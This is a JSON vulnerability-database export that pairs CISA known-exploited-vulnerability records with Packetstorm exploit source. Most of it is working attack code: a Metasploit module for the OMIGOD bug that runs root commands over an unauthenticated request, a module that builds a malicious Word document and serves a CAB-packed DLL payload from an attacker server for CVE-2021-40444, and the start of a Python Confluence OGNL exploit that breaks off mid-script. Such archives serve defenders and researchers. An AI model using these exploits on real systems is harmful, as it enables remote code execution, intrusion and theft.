"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-38647", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apple iOS, iPadOS, macOS, and watchOS CoreGraphics contain an integer overflow vulnerability which may allow code execution when processing a maliciously crafted PDF. The vulnerability is also known under the moniker of FORCEDENTRY.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apple Multiple Products Integer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30860", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Google Chromium V8 Engine contains an out-of-bounds write vulnerability which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability affects web browsers that utilize Chromium, including Google Chrome and Microsoft Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30632", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-28T15:41:03", "description": "", "cvss3": {}, "published": "2021-10-28T00:00:00", "type": "packetstorm", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-28T00:00:00", "id": "PACKETSTORM:164694", "href": "https://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nXML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft OMI Management Interface Authentication Bypass', \n'Description' => %q{ \nBy removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint \nthat will cause it to execute an operating system command as the root user. This vulnerability was patched in \nOMI version 1.6.8-1 (released September 8th 2021). \n}, \n'Author' => [ \n'Nir Ohfeld', # vulnerability discovery & research \n'Shir Tamari', # vulnerability discovery & research \n'Spencer McIntyre', # metasploit module \n'wvu' # vulnerability research \n], \n'References' => [ \n['CVE', '2021-38647'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'], \n['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'], \n['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'], \n['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647'] \n], \n'DisclosureDate' => '2021-09-14', \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 5985, \n'SSL' => false, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'AKA' => ['OMIGOD'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/wsman']) \n]) \nend \n \ndef check \nhttp_res = send_command('id') \nreturn CheckCode::Unknown if http_res.nil? \nreturn CheckCode::Safe unless http_res.code == 200 \n \ncmd_res = parse_response(http_res) \nreturn CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\$\\S+\$ / \n \nreturn CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nresult = execute_command(payload.encoded) \nif result \nprint_status(result[:stdout]) unless result[:stdout].blank? \nprint_error(result[:stderr]) unless result[:stderr].blank? \nend \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_command(cmd) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nparse_response(res) \nend \n \ndef parse_response(res) \nreturn nil unless res&.code == 200 \n \nreturn_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i \nunless return_code == 0 \nprint_error(\"Failed to execute command: #{cmd} (status: #{return_code})\") \nend \n \n{ \nreturn_code: return_code, \nstdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content, \nstderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content \n} \nend \n \ndef send_command(cmd) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'ctype' => 'text/xml;charset=UTF-8', \n'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0) \n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\"> \n<s:Header> \n<a:To>HTTP://127.0.0.1:5985/wsman/</a:To> \n<w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> \n<a:ReplyTo> \n<a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> \n</a:ReplyTo> \n<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action> \n<w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize> \n<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID> \n<w:OperationTimeout>PT1M30S</w:OperationTimeout> \n<w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<w:OptionSet s:mustUnderstand=\"true\"/> \n<w:SelectorSet> \n<w:Selector Name=\"__cimnamespace\">root/scx</w:Selector> \n</w:SelectorSet> \n</s:Header> \n<s:Body> \n<p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\"> \n<p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script> \n<p:Arguments/> \n<p:timeout>0</p:timeout> \n<p:b64encoded>true</p:b64encoded> \n</p:ExecuteScript_INPUT> \n</s:Body> \n</s:Envelope> \nENVELOPE \n) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164694/cve_2021_38647_omigod.rb.txt"}, {"lastseen": "2021-12-09T15:33:23", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSHTML Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "PACKETSTORM:165214", "href": "https://packetstormsecurity.com/files/165214/Microsoft-Office-Word-MSHTML-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word Malicious MSHTML RCE', \n'Description' => %q{ \nThis module creates a malicious docx file that when opened in Word on a vulnerable Windows \nsystem will lead to code execution. This vulnerability exists because an attacker can \ncraft a malicious ActiveX control to be used by a Microsoft Office document that hosts \nthe browser rendering engine. \n}, \n'References' => [ \n['CVE', '2021-40444'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'], \n['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'], \n['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'], \n['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'], \n['URL', 'https://github.com/klezVirus/CVE-2021-40444'] \n], \n'Author' => [ \n'lockedbyte ', # Vulnerability discovery. \n'klezVirus ', # References and PoC. \n'thesunRider', # Official Metasploit module. \n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring. \n], \n'DisclosureDate' => '2021-09-23', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'FILENAME' => 'msf.docx' \n}, \n'Targets' => [ \n[ \n'Hosted', {} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nregister_advanced_options([ \nOptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]), \n]) \nend \n \ndef bin_to_hex(bstr) \nreturn(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join) \nend \n \ndef cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\") \nchecksum = seed \n \nbytes = '' \ndata.chars.each_slice(4).map(&:join).each do |dword| \nif dword.length == 4 \nchecksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*') \nelse \nbytes = dword \nend \nend \nchecksum = checksum.reverse \n \ncase (data.length % 4) \nwhen 3 \ndword = \"\\x00#{bytes}\" \nwhen 2 \ndword = \"\\x00\\x00#{bytes}\" \nwhen 1 \ndword = \"\\x00\\x00\\x00#{bytes}\" \nelse \ndword = \"\\x00\\x00\\x00\\x00\" \nend \n \nchecksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse \nend \n \n# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf \ndef create_cab(data) \ncab_cfdata = '' \nfilename = \"../#{File.basename(@my_resources.first)}.inf\" \nblock_size = 32768 \nstruct_cffile = 0xd \nstruct_cfheader = 0x30 \n \nblock_counter = 0 \ndata.chars.each_slice(block_size).map(&:join).each do |block| \nblock_counter += 1 \n \nseed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\" \ncsum = cab_checksum(block, seed) \n \nvprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\") \ncab_cfdata << csum # uint32 {4} - Checksum \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length \ncab_cfdata << block \nend \n \ncab_size = [ \nstruct_cfheader + \nstruct_cffile + \nfilename.length + \ncab_cfdata.length \n].pack('L<') \n \n# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB) \ncab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF) \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << cab_size # uint32 {4} - Archive Length \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \n \ncab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << \"\\x03\" # byte {1} - Minor Version (3) \ncab_header << \"\\x01\" # byte {1} - Major Version (1) \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files \ncab_header << \"\\x00\\x00\" # uint16 {2} - Flags \n \ncab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number \ncab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set \n \n# CFFOLDER \ncab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder \nstruct_cfheader + \nstruct_cffile + \nfilename.length \n].pack('L<') \ncab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder \ncab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP) \n \n# increase file size to trigger vulnerability \ncab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\") \ndata.length + 1073741824 \n].pack('L<') \n \n# set current date and time in the format of cab file \ndate_time = Time.new \ndate = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S') \ntime = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S') \n \n# CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder) \ncab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0) \ncab_header << date # uint16 {2} - File Date (\\x5A\\x53) \ncab_header << time # uint16 {2} - File Time (\\xC3\\x5C) \ncab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes \ncab_header << filename # byte {X} - Filename (ASCII) \ncab_header << \"\\x00\" # byte {1} - null Filename Terminator \n \ncab_stream = cab_header \n \n# CFDATA \ncab_stream << cab_cfdata \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\" \ninf = \"#{File.basename(@my_resources.first)}.inf\" \n \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js') \njs_content = ::File.binread(file_path) \n \njs_content.gsub!('REPLACE_INF', inf) \njs_content.gsub!('REPLACE_URI', uri) \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += js_content.to_s \nhtml += '</script></body></html>' \nhtml \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx') \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/document.xml' \nentry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s) \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str[0, 1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_cab = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'application/octet-stream', \n'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\" \n} \n \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nif request.raw_uri.to_s.end_with? '.cab' \nsend_response(cli, '', header_cab) \nelse \nsend_response(cli, '', header_html) \nend \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.cab' \nprint_status('Sending CAB Payload') \n \nsend_response(cli, create_cab(@dll_payload), header_cab) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.match(/\\.xml|\\.rels$/i) \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? \ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \ndef primer \nprint_status('CVE-2021-40444: Generate a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \nif datastore['SRVHOST'] == '0.0.0.0' \ndatastore['SRVHOST'] = Rex::Socket.source_address \nend \n \ntemplate_path = get_template_path \nunless File.extname(template_path).match(/\\.docx$/i) \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@dll_payload = Msf::Util::EXE.to_win64pe_dll( \nframework, \npayload.encoded, \n{ \narch: payload.arch.first, \nmixed_mode: true, \nplatform: 'win' \n} \n) \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165214/word_mshtml_rce.rb.txt"}, {"lastseen": "2021-09-01T15:58:38", "description": "", "cvss3": {}, "published": "2021-09-01T00:00:00", "type": "packetstorm", "title": "Confluence Server 7.12.4 OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "PACKETSTORM:164013", "href": "https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) \n# Date: 01/09/2021 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.12.x versions before 7.12.5 \n# Tested on: Linux Distros \n# CVE : CVE-2021-26084 \n \n#!/usr/bin/python3 \n \n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html \n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md \n \nimport requests \nfrom bs4 import BeautifulSoup \nimport optparse \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\") \nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\") \n \noptions, args = parser.parse_args() \nsession = requests.Session() \n \nurl_vuln = options.url \nendpoint = options.path \n \nif not options.url or not options.path: \n \nprint('[+] Specify an url target') \nprint('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') \nprint('[+] Example help usage: exploit.py -h') \nexit() \n \n \ndef banner(): \n 